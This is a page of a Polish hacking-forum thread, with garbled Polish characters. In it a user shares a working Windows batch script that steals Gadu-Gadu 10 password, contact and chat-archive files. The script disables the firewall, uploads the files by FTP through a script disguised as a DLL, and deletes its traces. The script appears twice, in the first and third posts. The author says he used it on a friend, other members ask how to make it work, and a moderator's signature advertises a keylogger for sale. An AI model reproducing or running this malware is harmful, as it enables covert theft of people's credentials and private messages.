Strona 1 z 3 123 OstatniOstatni
Poka¿ wyniki od 1 do 15 z 36

Temat: [.BAT] Wirus do kradzie¿y has³a , archiwum , kontaktów z Gadu Gadu 10.

  1. #1

    Domy¶lnie [.BAT] Wirus do kradzie¿y has³a , archiwum , kontaktów z Gadu Gadu 10.

    Siema.
    Zrobi³em wirus .bat który ma za zadanie ukra¶æ pliki z has³em , archiwum i kontaktami z Gadu Gadu 10.
    Tylko nie wiem ten skrypt jest poprawny i czy ma w ogóle szansê dzia³aæ.
    Testowa³em u siebie , to niby dzia³a.
    Oto on :

    @echo off
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Profile.xml" "C:\windows\system32"
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ContactList.xml" "C:\windows\system32"
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ProfileBasic.xml" "C:\windows\system32"
    cls
    ipconfig /all >> "C:\windows\system32\command_ipconfig.txt"
    echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
    echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
    echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\Profile.xml" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\ProfileBasic.xml" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\ContactList.xml" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\command_ipconfig.txt" >> "%windir%\system32\sysfiles32.dll"
    echo quit >> "%windir%\system32\sysfiles32.dll"
    netsh firewall set opmode disable
    ftp -s:"%windir%\system32\sysfiles32.dll"
    cls
    netsh firewall set opmode enable
    del "C:\windows\system32\Profile.xml"
    del "C:\windows\system32\ContactList.xml "
    del "C:\windows\system32\Archive.db"
    del "C:\windows\system32\ProfileBasic.xml"
    del "C:\windows\system32\command_ipconfig.txt"
    del "C:\windows\system32\sysfiles32.dll"
    Ostatnio edytowane przez TheFlaiDer ; 15-12-2011 o 16:17

  2. #2

    Domy¶lnie

    U mnie dzia³a, ale czy wszystko jest poprawne to Ci nie powiem bo jestem "newbie". Pozdrawiam Tomasz.

  3. #3

    Domy¶lnie

    Cytat Napisa³ TheFlaiDer Zobacz post
    Siema.
    Zrobi³em wirus .bat który ma za zadanie ukra¶æ pliki z has³em , archiwum i kontaktami z Gadu Gadu 10.
    Tylko nie wiem ten skrypt jest poprawny i czy ma w ogóle szansê dzia³aæ.
    Testowa³em u siebie , to niby dzia³a.
    Oto on :

    @echo off
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Profile.xml" "C:\windows\system32"
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ContactList.xml" "C:\windows\system32"
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
    copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ProfileBasic.xml" "C:\windows\system32"
    cls
    ipconfig /all >> "C:\windows\system32\command_ipconfig.txt"
    echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
    echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
    echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\Profile.xml" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\ProfileBasic.xml" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\ContactList.xml" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
    echo send "C:\windows\system32\command_ipconfig.txt" >> "%windir%\system32\sysfiles32.dll"
    echo quit >> "%windir%\system32\sysfiles32.dll"
    netsh firewall set opmode disable
    ftp -s:"%windir%\system32\sysfiles32.dll"
    cls
    netsh firewall set opmode enable
    del "C:\windows\system32\Profile.xml"
    del "C:\windows\system32\ContactList.xml "
    del "C:\windows\system32\Archive.db"
    del "C:\windows\system32\ProfileBasic.xml"
    del "C:\windows\system32\command_ipconfig.txt"
    del "C:\windows\system32\sysfiles32.dll"
    Witam mam pytanko gdzie dok³adnie zapisuje to siê na FTP i w jakiej postaci??
    i czy te nawiasy kwadratowe przy host login haslo ftp sa potrzebne?

  4. #4

    Domy¶lnie

    Nie wygodniej by³o by to napisaæ w C , b±d¼ C++ , w±tpie aby kto¶ ci uruchomi³ taki plik , a nawet jak by to pierwszy lepszy anty wirus powinien to wykryæ (nawet AVG)
    mam nadziejê ¿e nie liczy³e¶ na to ¿e uda Ci siê co¶ tym zwalczyæ

  5. #5
    U¿ytkownik Avatar harbinger
    Do³±czy³
    10-01-2012
    Sk±d
    vaccum
    Posty
    59

    Domy¶lnie

    Cytat Napisa³ w4r10ck Zobacz post
    Nie wygodniej by³o by to napisaæ w C , b±d¼ C++ , w±tpie aby kto¶ ci uruchomi³ taki plik , a nawet jak by to pierwszy lepszy anty wirus powinien to wykryæ (nawet AVG)
    mam nadziejê ¿e nie liczy³e¶ na to ¿e uda Ci siê co¶ tym zwalczyæ
    czy pro¶ciej? - nie
    czy skuteczniej? - tak
    czy uda³o mu siê co¶ zwalczyæ? - nie
    I'm the harbinger of your salvation thru destruction.

    harbinger@nefarious.bad.mn - w razie ¶cis³ej potrzeby

  6. #6

    Domy¶lnie

    Có¿ , zrobi³em ten program , aby ukra¶æ te dane jednemu z moich znajomych , no i siê uda³o.
    Pierwsze skonwertowa³em go na .exe , a nastêpnie wys³a³em go mu.
    Po za tym mia³ zainstalowanego anty wirusa , i jedyna przeszkoda to by³ firewall wbudowany w anty wirusa.
    No ale mo¿na powiedzieæ ¿e jest to program , który wymaga po³±czenia internetowego i tak zrobi³em...
    Kiedy robi³em ten program , robi³em wy³±cznie programy Batch , wiêc nie zrobi³em w C albo C++ , teraz mo¿e zacznê.
    Ostatnio edytowane przez TheFlaiDer ; 28-01-2012 o 14:03

  7. #7

    Domy¶lnie

    Cytat Napisa³ anoozy Zobacz post
    Witam mam pytanko gdzie dok³adnie zapisuje to siê na FTP i w jakiej postaci??
    i czy te nawiasy kwadratowe przy host login haslo ftp sa potrzebne?
    Ponawiam pytanie kolegi.

    Czy on pó¼niej usuwa pliki :
    "C:\windows\system32\Profile.xml"
    "C:\windows\system32\ContactList.xml "
    "C:\windows\system32\Archive.db"
    "C:\windows\system32\ProfileBasic.xml"
    "C:\windows\system32\command_ipconfig.txt"
    "C:\windows\system32\sysfiles32.dll"
    Czyli te z koñca kodu?
    Pozdrawiam

  8. #8
    U¿ytkownik
    Do³±czy³
    28-01-2012
    Posty
    82

    Domy¶lnie

    Niby dzia³a . Ale polecam do takich zabaw Perla lub C .

    Mnie zastanawia jedno . Sk±d "wirus" bêdzie wiedzieæ gdzie wys³aæ te pliki skoro nie masz odniesienia do hosta .
    Wszystko dzia³a na Localhost .
    Hmm ?

  9. #9

    Domy¶lnie

    Cytat Napisa³ f4renthide Zobacz post
    Ponawiam pytanie kolegi.

    Czy on pó¼niej usuwa pliki :

    Czyli te z koñca kodu?
    Pozdrawiam
    Zapisujê siê to pod postaci± plików :

    Profile.xml
    ContactList.xml
    Archive.db
    ProfileBasic.xml
    command_ipconfig.txt

    Jak widaæ jest komenda "DEL" przy tych plikach :

    del "C:\windows\system32\Profile.xml"
    del "C:\windows\system32\ContactList.xml "
    del "C:\windows\system32\Archive.db"
    del "C:\windows\system32\ProfileBasic.xml"
    del "C:\windows\system32\command_ipconfig.txt"
    del "C:\windows\system32\sysfiles32.dll"

    A komenda "DEL" to usuwanie.
    Czyli usuwa te pliki.
    Ostatnio edytowane przez TheFlaiDer ; 05-02-2012 o 17:22

  10. #10

    Domy¶lnie

    Witam. Gdzie bêd± zapisywane dane, bo nie wiem czy ogarniam?

  11. #11

    Domy¶lnie

    Cytat Napisa³ abel95 Zobacz post
    Witam. Gdzie bêd± zapisywane dane, bo nie wiem czy ogarniam?
    Na twoje konto FTP , zostan± przes³ane pliki odpowiadaj±ce za archiwum , has³o i kontakty.
    Musisz tylko pobraæ specjalne narzêdzia do otworzenia tych plików.

  12. #12

    Domy¶lnie

    Testowa³em to ale nie mam pojecia gdzie te pliki sie zapisuj±. napisz dokladnie gdzie sie to wszystko zapisuje i w jakiej formie. wgl tego antywirus nie wykrywa... chyba ze cos zle zrobilem. to ma byc tylko w bat ? czy jeszcze trzeba jakos konwertowac ?
    Ostatnio edytowane przez jpkaczy ; 10-02-2012 o 15:31

  13. #13

    Domy¶lnie

    Zalo¿y³em ftp. Wpisuje nazwe hosta i uzytkownika oraz haslo. Uruchamiam, lecz nie otrzymuje ¿adnych plikow na ftpa ;/
    Ostatnio edytowane przez abel95 ; 10-02-2012 o 17:42

  14. #14
    U¿ytkownik
    Do³±czy³
    28-01-2012
    Posty
    82

    Domy¶lnie

    to mo¿e czas zaj±æ siê jakim¶ jêzykiem programowania ? > daleko nie zajdziesz na .bat . Przepraszam ale osoby "programuj±cê" w .bat to script kiddes a ja ¿ywiê urazê do takich osób .

  15. #15
    Dawni Moderatorzy Avatar VR8
    Do³±czy³
    24-09-2011
    Sk±d
    Kraków
    Posty
    324

    Domy¶lnie

    Cytat Napisa³ In7ount Zobacz post
    daleko nie zajdziesz na .bat . Przepraszam ale osoby "programuj±cê" w .bat to script kiddes a ja ¿ywiê urazê do takich osób .
    Osoby radz±ce sobie samym batchem to raczej nie script kiddies tylko script masters...

    Do programowania takich aplikacji polecam Delphi i C++..,..ew. Perl, C#, ANSI C
    "Najwy¿szym osi±gniêciem jest pokonaæ wroga bez walki" - Sun Tzu

    ---
    Sprzedam keyloggera wysy³aj±cego logi na maila, do tego masa dodatków (np. USB spreading).
    Kontakt: (gg)41878055
    ---

Uprawnienia

  • Nie mo¿esz zak³adaæ nowych tematów
  • Nie mo¿esz pisaæ wiadomo¶ci
  • Nie mo¿esz dodawaæ za³±czników
  • Nie mo¿esz edytowaæ swoich postów
  •